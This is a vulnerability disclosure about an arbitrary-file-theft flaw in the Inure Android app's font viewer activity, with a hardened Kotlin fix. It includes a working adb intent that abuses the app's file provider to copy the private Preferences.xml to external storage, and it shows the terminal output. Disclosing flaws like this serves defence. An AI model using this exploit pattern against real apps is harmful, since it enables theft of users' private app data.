Using Oversecured, a leading vulnerability scanner for Android and iOS applications, we detected a Theft of Arbitrary Files vulnerability in TTFViewerActivity.kt. Check the full issue definition in the image below:
The TTFViewerActivity failed to adequately validate the incoming intent.data before forwarding it to the openInputStream function, which made it possible to access arbitrary files. For instance, a caller could supply content:// data using the Inure application's file provider scheme, thereby extracting files from its internal directory.
The opened files could be extracted because they were stored in a publicly accessible directory: the activity used context.getExternalFilesDir to save the files in that location.
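A hardened version of the flow described above, as an added example that is not Inure's own code or its actual fix: it rejects URIs served by the app's own providers before calling openInputStream and writes the copy to internal storage. The object name SafeFontImport, its function names and the preview.ttf file name are assumptions made for illustration.

```kotlin
import android.content.ContentResolver
import android.content.Context
import android.net.Uri
import java.io.File
import java.io.IOException

// Hypothetical helper (not part of Inure): validates an incoming font URI
// and copies it into app-private storage.
object SafeFontImport {

    /** True only for content:// URIs that are NOT served by this app's own providers. */
    fun isForeignContentUri(context: Context, uri: Uri): Boolean {
        // Only content:// is accepted; file:// and every other scheme are refused.
        if (uri.scheme != ContentResolver.SCHEME_CONTENT) return false
        val authority = uri.authority ?: return false
        // An app can always resolve its own providers, so a URI aimed at our
        // FileProvider is reliably detected here. Reading it would mean opening
        // our own private files on the caller's behalf.
        val provider = context.packageManager.resolveContentProvider(authority, 0)
        return provider?.packageName != context.packageName
    }

    /** Copies the font into internal cache; returns null when the URI is rejected. */
    @Throws(IOException::class)
    fun copyToPrivateCache(context: Context, uri: Uri?): File? {
        val safeUri = uri?.takeIf { isForeignContentUri(context, it) } ?: return null
        // cacheDir is internal storage, private to the app, unlike the directory
        // returned by getExternalFilesDir(). The file name is fixed, so nothing
        // taken from the URI ends up in the destination path.
        val dir = File(context.cacheDir, "font_cache").apply { mkdirs() }
        val target = File(dir, "preview.ttf")
        val input = context.contentResolver.openInputStream(safeUri) ?: return null
        input.use { src -> target.outputStream().use { dst -> src.copyTo(dst) } }
        return target
    }
}
```

An activity would call SafeFontImport.copyToPrivateCache(this, intent.data) and finish when it returns null.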
This attack was chained with an insecure usage within the provider paths, which further contributed to the exploit:
Access your device shell using adb shell, then navigate to /storage/emulated/0/Android/data/app.simple.inure/files/font_cache in order to examine the contents of the directory. For now it's empty:
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la
total 6
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:18 .
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..
Send the following intent:
adb shell am start -n app.simple.inure/.activities.association.TTFViewerActivity -d "content://app.simple.inure.provider/root/data/data/app.simple.inure/shared_prefs/Preferences.xml" -a "android.intent.action.VIEW" -t "font/ttf"
Review the font_cache directory again and notice that Preferences.xml was saved:
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ ls -la
total 10
drwxrwx--x 2 u0_a508 sdcard_rw 3488 2023-08-25 07:22 .
drwxrwx--x 4 u0_a508 sdcard_rw 3488 2023-08-24 22:30 ..
-rw-rw---- 1 u0_a508 sdcard_rw 771 2023-08-25 07:22 Preferences.xml
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $ cat Preferences.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<boolean name="apk_external_storage" value="false" />
<boolean name="is_external_storage" value="false" />
<int name="app_accent_color" value="-29592" />
<boolean name="dont_show_again" value="true" />
<int name="main_app_launch_count" value="13" />
<boolean name="is_custom_color" value="false" />
<int name="view_positions" value="7" />
<int name="notes_list_type" value="0" />
<boolean name="disclaimer_agreed" value="true" />
<string name="last_search_keyword"></string>
<string name="home_path">/data/user/0/app.simple.inure/app_HOME</string>
<long name="crash_timestamp" value="-1" />
<boolean name="deep_search_keyword_mode" value="false" />
</map>
angelica:/storage/emulated/0/Android/data/app.simple.inure/files/font_cache $